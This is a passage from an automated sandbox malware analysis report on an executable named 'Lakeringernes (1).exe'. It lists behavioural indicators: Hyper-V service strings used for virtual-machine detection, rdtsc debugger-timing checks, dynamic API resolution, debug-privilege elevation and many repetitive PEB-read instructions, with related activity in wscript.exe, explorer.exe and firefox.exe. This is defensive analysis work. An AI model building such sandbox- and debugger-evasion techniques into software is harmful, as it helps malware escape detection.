Source: Lakeringernes (1).exe, 00000002.00000002.2212149150.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: Lakeringernes (1).exe, 00000002.00000002.2212149150.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Lakeringernes (1).exe, 00000002.00000002.2212149150.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Lakeringernes (1).exe, 00000002.00000002.2212149150.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: Lakeringernes (1).exe, 00000006.00000003.2293684770.0000000001961000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000003.2190448505.0000000001961000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2298865351.00000000018F8000.00000004.00000020.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2299626181.0000000001961000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6793979742.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.6813301028.0000000007610000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2670805599.000000000998B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2521075734.0000000010A90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2752008567.0000000010A90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2633953083.0000000010A90000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000000.2625224857.000000000D2EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2510398765.000000000D2EC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-USn
Source: Lakeringernes (1).exe, 00000002.00000002.2212149150.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Lakeringernes (1).exe, 00000002.00000002.2212149150.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Lakeringernes (1).exe, 00000002.00000002.2212149150.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Lakeringernes (1).exe, 00000006.00000002.2300468627.0000000003399000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: firefox.exe, 0000000C.00000002.3018897648.0000029BC6D00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll//
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 2_2_10001A5D
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B072C rdtsc 2_2_032B072C
Enables debug privileges
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D3F37 mov eax, dword ptr fs:[00000030h] 2_2_032D3F37
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032BCE8C mov eax, dword ptr fs:[00000030h] 2_2_032BCE8C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032BC6DE mov eax, dword ptr fs:[00000030h] 2_2_032BC6DE
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B7858 mov eax, dword ptr fs:[00000030h] 2_2_032B7858
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B78C9 mov eax, dword ptr fs:[00000030h] 2_2_032B78C9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83CD8A mov eax, dword ptr fs:[00000030h] 6_2_1D83CD8A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83CD8A mov eax, dword ptr fs:[00000030h] 6_2_1D83CD8A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D846D91 mov eax, dword ptr fs:[00000030h] 6_2_1D846D91
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D836DA6 mov eax, dword ptr fs:[00000030h] 6_2_1D836DA6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D847DB6 mov eax, dword ptr fs:[00000030h] 6_2_1D847DB6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83DDB0 mov eax, dword ptr fs:[00000030h] 6_2_1D83DDB0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914DA7 mov eax, dword ptr fs:[00000030h] 6_2_1D914DA7
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872DBC mov eax, dword ptr fs:[00000030h] 6_2_1D872DBC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872DBC mov ecx, dword ptr fs:[00000030h] 6_2_1D872DBC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D838DCD mov eax, dword ptr fs:[00000030h] 6_2_1D838DCD
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FADD6 mov eax, dword ptr fs:[00000030h] 6_2_1D8FADD6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FADD6 mov eax, dword ptr fs:[00000030h] 6_2_1D8FADD6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84BDE0 mov eax, dword ptr fs:[00000030h] 6_2_1D84BDE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84BDE0 mov eax, dword ptr fs:[00000030h] 6_2_1D84BDE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84BDE0 mov eax, dword ptr fs:[00000030h] 6_2_1D84BDE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84BDE0 mov eax, dword ptr fs:[00000030h] 6_2_1D84BDE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84BDE0 mov eax, dword ptr fs:[00000030h] 6_2_1D84BDE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84BDE0 mov eax, dword ptr fs:[00000030h] 6_2_1D84BDE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84BDE0 mov eax, dword ptr fs:[00000030h] 6_2_1D84BDE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84BDE0 mov eax, dword ptr fs:[00000030h] 6_2_1D84BDE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86FDE0 mov eax, dword ptr fs:[00000030h] 6_2_1D86FDE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83EDFA mov eax, dword ptr fs:[00000030h] 6_2_1D83EDFA
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 mov eax, dword ptr fs:[00000030h] 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90CDEB mov eax, dword ptr fs:[00000030h] 6_2_1D90CDEB
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90CDEB mov eax, dword ptr fs:[00000030h] 6_2_1D90CDEB
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84AD00 mov eax, dword ptr fs:[00000030h] 6_2_1D84AD00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84AD00 mov eax, dword ptr fs:[00000030h] 6_2_1D84AD00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84AD00 mov eax, dword ptr fs:[00000030h] 6_2_1D84AD00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84AD00 mov eax, dword ptr fs:[00000030h] 6_2_1D84AD00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84AD00 mov eax, dword ptr fs:[00000030h] 6_2_1D84AD00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84AD00 mov eax, dword ptr fs:[00000030h] 6_2_1D84AD00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D860D01 mov eax, dword ptr fs:[00000030h] 6_2_1D860D01
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FBD08 mov eax, dword ptr fs:[00000030h] 6_2_1D8FBD08
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FBD08 mov eax, dword ptr fs:[00000030h] 6_2_1D8FBD08
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D8D0A mov eax, dword ptr fs:[00000030h] 6_2_1D8D8D0A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CCD00 mov eax, dword ptr fs:[00000030h] 6_2_1D8CCD00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CCD00 mov eax, dword ptr fs:[00000030h] 6_2_1D8CCD00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86CD10 mov eax, dword ptr fs:[00000030h] 6_2_1D86CD10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86CD10 mov ecx, dword ptr fs:[00000030h] 6_2_1D86CD10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83FD20 mov eax, dword ptr fs:[00000030h] 6_2_1D83FD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov eax, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov eax, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov eax, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov ecx, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov eax, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov eax, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov eax, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov eax, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov eax, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86AD20 mov eax, dword ptr fs:[00000030h] 6_2_1D86AD20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0D24 mov eax, dword ptr fs:[00000030h] 6_2_1D8F0D24
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0D24 mov eax, dword ptr fs:[00000030h] 6_2_1D8F0D24
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0D24 mov eax, dword ptr fs:[00000030h] 6_2_1D8F0D24
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0D24 mov eax, dword ptr fs:[00000030h] 6_2_1D8F0D24
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D839D46 mov eax, dword ptr fs:[00000030h] 6_2_1D839D46
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D839D46 mov eax, dword ptr fs:[00000030h] 6_2_1D839D46
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D839D46 mov ecx, dword ptr fs:[00000030h] 6_2_1D839D46
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DD4D mov eax, dword ptr fs:[00000030h] 6_2_1D85DD4D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DD4D mov eax, dword ptr fs:[00000030h] 6_2_1D85DD4D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DD4D mov eax, dword ptr fs:[00000030h] 6_2_1D85DD4D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BCD40 mov eax, dword ptr fs:[00000030h] 6_2_1D8BCD40
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BCD40 mov eax, dword ptr fs:[00000030h] 6_2_1D8BCD40
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C1D5E mov eax, dword ptr fs:[00000030h] 6_2_1D8C1D5E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D905D43 mov eax, dword ptr fs:[00000030h] 6_2_1D905D43
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D905D43 mov eax, dword ptr fs:[00000030h] 6_2_1D905D43
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D841D50 mov eax, dword ptr fs:[00000030h] 6_2_1D841D50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D841D50 mov eax, dword ptr fs:[00000030h] 6_2_1D841D50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914D4B mov eax, dword ptr fs:[00000030h] 6_2_1D914D4B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D855D60 mov eax, dword ptr fs:[00000030h] 6_2_1D855D60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C5D60 mov eax, dword ptr fs:[00000030h] 6_2_1D8C5D60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D915D65 mov eax, dword ptr fs:[00000030h] 6_2_1D915D65
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87BD71 mov eax, dword ptr fs:[00000030h] 6_2_1D87BD71
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87BD71 mov eax, dword ptr fs:[00000030h] 6_2_1D87BD71
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E6D79 mov esi, dword ptr fs:[00000030h] 6_2_1D8E6D79
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D837C85 mov eax, dword ptr fs:[00000030h] 6_2_1D837C85
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D837C85 mov eax, dword ptr fs:[00000030h] 6_2_1D837C85
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D837C85 mov eax, dword ptr fs:[00000030h] 6_2_1D837C85
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D837C85 mov eax, dword ptr fs:[00000030h] 6_2_1D837C85
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D837C85 mov eax, dword ptr fs:[00000030h] 6_2_1D837C85
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C3C80 mov ecx, dword ptr fs:[00000030h] 6_2_1D8C3C80
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D847C95 mov eax, dword ptr fs:[00000030h] 6_2_1D847C95
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D847C95 mov eax, dword ptr fs:[00000030h] 6_2_1D847C95
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E9C98 mov ecx, dword ptr fs:[00000030h] 6_2_1D8E9C98
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E9C98 mov eax, dword ptr fs:[00000030h] 6_2_1D8E9C98
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E9C98 mov eax, dword ptr fs:[00000030h] 6_2_1D8E9C98
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E9C98 mov eax, dword ptr fs:[00000030h] 6_2_1D8E9C98
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FFC95 mov eax, dword ptr fs:[00000030h] 6_2_1D8FFC95
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D836CC0 mov eax, dword ptr fs:[00000030h] 6_2_1D836CC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D836CC0 mov eax, dword ptr fs:[00000030h] 6_2_1D836CC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D836CC0 mov eax, dword ptr fs:[00000030h] 6_2_1D836CC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914CD2 mov eax, dword ptr fs:[00000030h] 6_2_1D914CD2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D876CC0 mov eax, dword ptr fs:[00000030h] 6_2_1D876CC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D879CCF mov eax, dword ptr fs:[00000030h] 6_2_1D879CCF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84FCC9 mov eax, dword ptr fs:[00000030h] 6_2_1D84FCC9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DCD1 mov eax, dword ptr fs:[00000030h] 6_2_1D85DCD1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DCD1 mov eax, dword ptr fs:[00000030h] 6_2_1D85DCD1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85DCD1 mov eax, dword ptr fs:[00000030h] 6_2_1D85DCD1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87CCD1 mov ecx, dword ptr fs:[00000030h] 6_2_1D87CCD1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87CCD1 mov eax, dword ptr fs:[00000030h] 6_2_1D87CCD1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87CCD1 mov eax, dword ptr fs:[00000030h] 6_2_1D87CCD1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D868CDF mov eax, dword ptr fs:[00000030h] 6_2_1D868CDF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D868CDF mov eax, dword ptr fs:[00000030h] 6_2_1D868CDF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D3CD4 mov eax, dword ptr fs:[00000030h] 6_2_1D8D3CD4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D3CD4 mov eax, dword ptr fs:[00000030h] 6_2_1D8D3CD4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D3CD4 mov ecx, dword ptr fs:[00000030h] 6_2_1D8D3CD4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D3CD4 mov eax, dword ptr fs:[00000030h] 6_2_1D8D3CD4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D3CD4 mov eax, dword ptr fs:[00000030h] 6_2_1D8D3CD4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C5CD0 mov eax, dword ptr fs:[00000030h] 6_2_1D8C5CD0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D2CD0 mov eax, dword ptr fs:[00000030h] 6_2_1D8D2CD0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D2CD0 mov eax, dword ptr fs:[00000030h] 6_2_1D8D2CD0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D2CD0 mov eax, dword ptr fs:[00000030h] 6_2_1D8D2CD0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C0CEE mov eax, dword ptr fs:[00000030h] 6_2_1D8C0CEE
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D7CE8 mov eax, dword ptr fs:[00000030h] 6_2_1D8D7CE8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D837CF1 mov eax, dword ptr fs:[00000030h] 6_2_1D837CF1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D843CF0 mov eax, dword ptr fs:[00000030h] 6_2_1D843CF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D843CF0 mov eax, dword ptr fs:[00000030h] 6_2_1D843CF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86ECF3 mov eax, dword ptr fs:[00000030h] 6_2_1D86ECF3
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86ECF3 mov eax, dword ptr fs:[00000030h] 6_2_1D86ECF3
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BCCF0 mov ecx, dword ptr fs:[00000030h] 6_2_1D8BCCF0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872C10 mov eax, dword ptr fs:[00000030h] 6_2_1D872C10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872C10 mov eax, dword ptr fs:[00000030h] 6_2_1D872C10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872C10 mov eax, dword ptr fs:[00000030h] 6_2_1D872C10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D872C10 mov eax, dword ptr fs:[00000030h] 6_2_1D872C10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C20 mov eax, dword ptr fs:[00000030h] 6_2_1D853C20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85AC20 mov eax, dword ptr fs:[00000030h] 6_2_1D85AC20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85AC20 mov eax, dword ptr fs:[00000030h] 6_2_1D85AC20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85AC20 mov eax, dword ptr fs:[00000030h] 6_2_1D85AC20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D905C38 mov eax, dword ptr fs:[00000030h] 6_2_1D905C38
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D905C38 mov ecx, dword ptr fs:[00000030h] 6_2_1D905C38
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D7C38 mov eax, dword ptr fs:[00000030h] 6_2_1D8D7C38
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D874C3D mov eax, dword ptr fs:[00000030h] 6_2_1D874C3D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D838C3D mov eax, dword ptr fs:[00000030h] 6_2_1D838C3D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83DC40 mov eax, dword ptr fs:[00000030h] 6_2_1D83DC40
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C40 mov eax, dword ptr fs:[00000030h] 6_2_1D853C40
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D914C59 mov eax, dword ptr fs:[00000030h] 6_2_1D914C59
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C3C57 mov eax, dword ptr fs:[00000030h] 6_2_1D8C3C57
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov ecx, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov ecx, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov ecx, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov ecx, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov ecx, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov ecx, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 mov eax, dword ptr fs:[00000030h] 6_2_1D853C60
